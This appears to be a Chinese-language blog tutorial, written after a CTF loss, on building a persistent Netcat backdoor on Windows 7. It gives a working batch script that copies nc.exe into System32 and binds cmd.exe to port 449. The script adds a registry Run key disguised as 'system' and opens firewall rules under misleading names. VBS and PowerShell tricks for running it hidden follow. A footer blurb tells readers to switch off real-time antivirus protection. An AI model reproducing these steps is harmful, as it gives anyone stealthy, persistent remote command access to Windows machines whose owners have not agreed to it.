windows下后门技术(netcat篇)

由于这次ctf的失利,来补习一下知识吧!

windows下后门

环境 win7 nc.exe

假设用administrator登陆用nc创建了一个后门,Netcat 功能比较单一, 缺少了许多我们渗透工作中需要的功能。为此我们将创建一个便携式的工具包来解决这个问题

便携式工具(Portable Applications)

便携式工具是那些不需要安装就能直接使用的程序,它们往往将所有的执行环境和核心程序本身一同打包成一个独立的文件,方便携带。在独立文件执行的过程中会自行释放额的需求文件,并构建一个可顺利执行目标程序的环境。 例如Python打包的exe文件

1.不依赖特定的dll(dll已经打包)
2.不依赖注册表设置(有可能自行初始化) ,不遗留下任何注册表操作痕迹
3.操作痕迹最小化,尽量避免一切不必要的操作,导致留下过多的系统操作记录

创建 Windows 7 工具集

1.Wget
2.gvim
3.nc

由于已经装过了 就不找下载连接了

0×01初试 Netcat 后门

nc.exe -dLp 449 -e cmd.exe

一般在windows下第一次使用NC的时候会提示你 是否允许访问网络 如果选择否 那就不行了

防火墙

这个时候我们就要对防火墙进行一些设置了

必须想到注册表设置啊

可以参考一下 这个

metasploit-persistent-netcat-backdoor

第一步 拷贝nc

C:\Users\Administrator>xcopy "%systemdrive%%homepath%\Desktop\1.bat" "C:\Windows
\System32\"

第二步 修改注册表

@echo off

Rem 拷贝文件到系统目录

xcopy "%systemdrive%\%username%\Desktop\nc.exe" "C:
\Windows\System32\" -y

Rem 修改注册表,增加后门自启动代码.

reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t
REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"

Rem 添加防火墙规则,开放监听的449端口,允许外部连接.

netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow
protocol=UDP localport=449
netsh advfirewall firewall add rule name="Rule 35" dir=in action=allow
protocol=TCP localport=449

Rem 添加防火墙规则,允许nc.exe对外提供连接.

netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow
program="C:\windows\system32\nc.exe"

注意:

1.必须使用管理员权限运行上面的脚本.

2.行为注释可删除

第三步 : 使用 VBS 脚本后台运行 Netcat

这样做的好处是我们不用等待电脑重启

Dim objShell
Set objShell = WScript.CreateObject("WScript.shell")
objShell.run "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Set objShell = Nothing

finall 使用 Netcat 连接后门

nc-v 目标IP 目标端口

nc

以后 就可以直接连接了

下面来介绍几种不使用CMD运行命令或者批处理脚本的方法

Vbscript

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "C:\mybat.bat" & Chr(34), 0
Set WshShell = Nothing

Batch

@echo off
start /B mybat.bat

powershell

PowerShell.exe -windowstyle hidden

这个文章里面有windows破坏的一些脚本

  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows Netcat是一款在Windows环境下运行的工具,它是一款简单的Unix工具,使用UDP和TCP协议。它可以作为后台操作工具,同时也可以用作网络测试工具或黑客工具。 安装Windows Netcat的步骤如下: 1. 关闭Windows防火墙:打开“Windows安全中心”-“病毒和威胁防护”-将“实时保护”关闭。 2. 下载安装包:可以从官网下载,也可以使用提供的软件包。 3. 安装:将安装包解压到一个无中文目录的文件夹下,然后将解压后的netcat路径添加到系统环境变量中的"Path"中。 4. 测试:打开命令提示符窗口,输入"nc -lp 9999"命令来监听9999端口,并在另一个命令提示符窗口中输入"nc localhost 9999"命令来接收数据。 以上是安装和使用Windows Netcat的步骤。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【windows-nc】windows环境netcat(nc)安装](https://blog.csdn.net/AFiveStudy/article/details/129272607)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [windows netcat](https://download.csdn.net/download/w609177135/4465976)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [windows下安装使用netcat](https://blog.csdn.net/wokoone/article/details/127661145)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值